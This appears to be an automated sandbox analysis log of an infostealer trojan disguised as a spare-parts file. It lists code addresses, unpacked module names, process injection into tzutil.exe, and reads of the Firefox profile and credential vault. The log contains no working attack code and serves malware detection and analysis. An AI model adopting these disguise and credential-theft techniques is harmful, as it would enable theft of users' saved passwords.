                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01215BF04_2_01215BF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011DDBF94_2_011DDBF9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01213A6C4_2_01213A6C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01257A464_2_01257A46
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125FA494_2_0125FA49
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01241AA34_2_01241AA3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123DAAC4_2_0123DAAC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E5AA04_2_011E5AA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0124DAC64_2_0124DAC6
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01257D734_2_01257D73
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A3D404_2_011A3D40
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01251D5A4_2_01251D5A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BFDC04_2_011BFDC0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01219C324_2_01219C32
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125FCF24_2_0125FCF2
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125FF094_2_0125FF09
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A1F924_2_011A1F92
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125FFB14_2_0125FFB1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A9EB04_2_011A9EB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345A3529_2_0345A352
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034603E69_2_034603E6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033AE3F09_2_033AE3F0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034402749_2_03440274
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034202C09_2_034202C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034281589_2_03428158
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033901009_2_03390100
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0343A1189_2_0343A118
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034581CC9_2_034581CC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034541A29_2_034541A2
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034601AA9_2_034601AA
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034320009_2_03432000
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A07709_2_033A0770
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033C47509_2_033C4750
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0339C7C09_2_0339C7C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033BC6E09_2_033BC6E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A05359_2_033A0535
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034605919_2_03460591
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034524469_2_03452446
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034444209_2_03444420
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0344E4F69_2_0344E4F6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345AB409_2_0345AB40
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03456BD79_2_03456BD7
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0339EA809_2_0339EA80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033B69629_2_033B6962
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A29A09_2_033A29A0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0346A9A69_2_0346A9A6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033AA8409_2_033AA840
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A28409_2_033A2840
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033868B89_2_033868B8
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033CE8F09_2_033CE8F0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03414F409_2_03414F40
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033C0F309_2_033C0F30
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033E2F289_2_033E2F28
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03442F309_2_03442F30
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033ACFE09_2_033ACFE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0341EFA09_2_0341EFA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03392FC89_2_03392FC8
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345EE269_2_0345EE26
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A0E599_2_033A0E59
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345EEDB9_2_0345EEDB
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033B2E909_2_033B2E90
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345CE939_2_0345CE93
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033AAD009_2_033AAD00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0343CD1F9_2_0343CD1F
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033B8DBF9_2_033B8DBF
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0339ADE09_2_0339ADE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A0C009_2_033A0C00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03390CF29_2_03390CF2
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03440CB59_2_03440CB5
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345132D9_2_0345132D
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0338D34C9_2_0338D34C
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033E739A9_2_033E739A
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A52A09_2_033A52A0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034412ED9_2_034412ED
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033BB2C09_2_033BB2C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0346B16B9_2_0346B16B
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0338F1729_2_0338F172
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033D516C9_2_033D516C
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033AB1B09_2_033AB1B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0344F0CC9_2_0344F0CC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345F0E09_2_0345F0E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034570E99_2_034570E9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A70C09_2_033A70C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345F7B09_2_0345F7B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033E56309_2_033E5630
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034516CC9_2_034516CC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034575719_2_03457571
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034695C39_2_034695C3
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0343D5B09_2_0343D5B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033914609_2_03391460
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345F43F9_2_0345F43F
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FB769_2_0345FB76
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03415BF09_2_03415BF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033BFB809_2_033BFB80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033DDBF99_2_033DDBF9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03457A469_2_03457A46
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FA499_2_0345FA49
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03413A6C9_2_03413A6C
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0344DAC69_2_0344DAC6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033E5AA09_2_033E5AA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03441AA39_2_03441AA3
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0343DAAC9_2_0343DAAC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_034359109_2_03435910
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A99509_2_033A9950
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033BB9509_2_033BB950
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0340D8009_2_0340D800
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A38E09_2_033A38E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FF099_2_0345FF09
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A1F929_2_033A1F92
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03363FD59_2_03363FD5
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03363FD29_2_03363FD2
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FFB19_2_0345FFB1
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A9EB09_2_033A9EB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03451D5A9_2_03451D5A
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03457D739_2_03457D73
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033A3D409_2_033A3D40
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033BFDC09_2_033BFDC0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_03419C329_2_03419C32
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0345FCF29_2_0345FCF2
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB21309_2_00AB2130
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAD0489_2_00AAD048
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAD0509_2_00AAD050
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAB2909_2_00AAB290
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAD2709_2_00AAD270
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AAB3E09_2_00AAB3E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB57F09_2_00AB57F0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB39FB9_2_00AB39FB
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB3A009_2_00AB3A00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00ACBD509_2_00ACBD50
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CE5449_2_031CE544
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CE4269_2_031CE426
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CD9A89_2_031CD9A8
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CE8DC9_2_031CE8DC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_031CCC489_2_031CCC48
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 0118B970 appears 280 times
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 011E7E54 appears 101 times
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 011D5130 appears 58 times
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 0120EA12 appears 86 times
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: String function: 0121F290 appears 105 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0341F290 appears 105 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 033E7E54 appears 110 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 033D5130 appears 58 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0340EA12 appears 86 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0338B970 appears 280 times
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000002.1379521165.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000000.1338874237.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemSVq.exe@ vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000002.1391339885.0000000007C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000002.1388807921.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000000.00000002.1391242614.0000000007480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.000000000128D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000D17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeBinary or memory string: OriginalFilenamemSVq.exe@ vs XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, B8wjwMpAXSs0e9RYt6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, fHWnEOM2Tpf5Q5oMa0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, fHWnEOM2Tpf5Q5oMa0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, fHWnEOM2Tpf5Q5oMa0.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@6/3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\tzutil.exeFile created: C:\Users\user\AppData\Local\Temp\UQ63g7r-Jump to behavior
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.2131739648.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2601354359.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2601354359.0000000000C33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: unknownProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"Jump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeSection loaded: dnsapi.dllJump to behavior
